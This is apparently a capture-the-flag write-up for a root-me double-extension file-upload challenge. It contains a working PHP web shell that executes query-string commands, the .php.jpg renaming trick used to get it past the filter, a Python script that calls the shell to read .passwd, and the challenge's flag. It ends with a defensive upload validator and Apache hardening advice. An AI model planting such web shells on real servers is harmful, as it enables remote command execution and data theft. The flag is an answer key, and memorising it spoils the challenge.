
File upload - Double extensions

Statement

Your goal is to hack this photo gallery by uploading PHP code.

Retrieve the validation password in the file .passwd at the root of the application.

Solution

Write a small PHP file that runs whatever command is passed in the query string and prints the output:

```php
<?php
// Command comes straight from the query string; the output is echoed back in the page.
$command = $_GET['command'];
$output = shell_exec($command);
echo "<p> $output </p>";
?>
```

Then rename it to exploitit.php.jpg and upload it to the server. The gallery's check only looks at the last extension, so the file is accepted as an image, while the web server still hands a name containing .php to the PHP interpreter.

Then call it with:

```python
import requests

# Upload path as served by the challenge; the command is passed in the query string.
URL = 'http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/694193751d4a423a2179aadef22b5be4/exploitit.php.jpg?command={}'

command = "cd ../../../; cat .passwd"

r = requests.get(URL.format(command))
print(r.text)
```

Note that .passwd is at the challenge's root, not the system's root, so cat /.passwd won't work!
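The upload filter fails here because it trusts the last extension alone. For comparison, the following validator, written for this post as an added example (it is not the challenge's or root-me's code, and it is in Python rather than the gallery's PHP), rejects the same upload: it refuses path components, treats every dot-separated part after the base name as an extension, whitelists only the final one, checks the file's magic bytes against the claimed type, and stores the file under a server-generated name. The ALLOWED table, the EXECUTABLE set and the sample uploads are constructed for the example.

```python
import os
import secrets

# Constructed table of permitted final extensions and the magic bytes each must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Extensions a typical PHP web server may hand to an interpreter (constructed list).
# Any of these appearing anywhere after the first dot is rejected, not just in last position.
EXECUTABLE = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "htaccess", "cgi", "pl", "py", "sh",
}


def validate_upload(filename: str, content: bytes):
    """Return (True, ext) if the upload passes every check, else (False, reason)."""
    # Reject anything that is not a bare file name (path traversal, NUL truncation).
    name = os.path.basename(filename)
    if not name or name != filename or "\x00" in name:
        return False, "filename contains a path separator or NUL byte"

    # Split on every dot; lower-case so 'Exploit.PHP.JPG' is treated like 'exploit.php.jpg'.
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension, or dotfile such as .htaccess"

    # Defence in depth: no executable extension in any position after the base name,
    # which is exactly what catches 'exploitit.php.jpg'.
    tail = parts[1:]
    if any(p in EXECUTABLE for p in tail):
        return False, "executable extension present in filename"

    # Whitelist the final extension rather than blacklisting bad ones.
    ext = tail[-1]
    if ext not in ALLOWED:
        return False, f"extension '{ext}' is not an allowed image type"

    # The bytes must look like the claimed image type, not like PHP source.
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return False, "file content does not match its extension"

    return True, ext


def stored_name(ext: str) -> str:
    """Never reuse the client's name: store under a random name plus the validated extension."""
    return secrets.token_hex(16) + "." + ext


# Constructed sample uploads, in the shape the gallery would receive them.
JPEG_HEAD = b"\xff\xd8\xff\xe0" + b"\x00" * 12
SAMPLES = [
    ("cat.jpg", JPEG_HEAD),                      # legitimate image
    ("exploitit.php.jpg", JPEG_HEAD),            # the double extension from this post
    ("photo.jpg", b"<?php echo 1; ?>"),          # right extension, wrong content
    ("../photo.jpg", JPEG_HEAD),                 # path component
]

if __name__ == "__main__":
    for fname, body in SAMPLES:
        ok, info = validate_upload(fname, body)
        print(f"{fname:20} -> {'stored as ' + stored_name(info) if ok else 'rejected: ' + info}")
```

The filename check is only half of the fix. On Apache, a handler registered with `AddHandler application/x-httpd-php .php` applies to every extension in the name, which is why the renamed file still executes; mapping the handler with `<FilesMatch "\.php$">` and `SetHandler` limits execution to names that end in .php, and serving the upload directory with `php_admin_flag engine off` removes the interpreter from it altogether.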

The flag is

```text
Gg9LRz-hWSxqqUKd77-_q-6G8
```
This post is licensed under CC BY 4.0 by the author.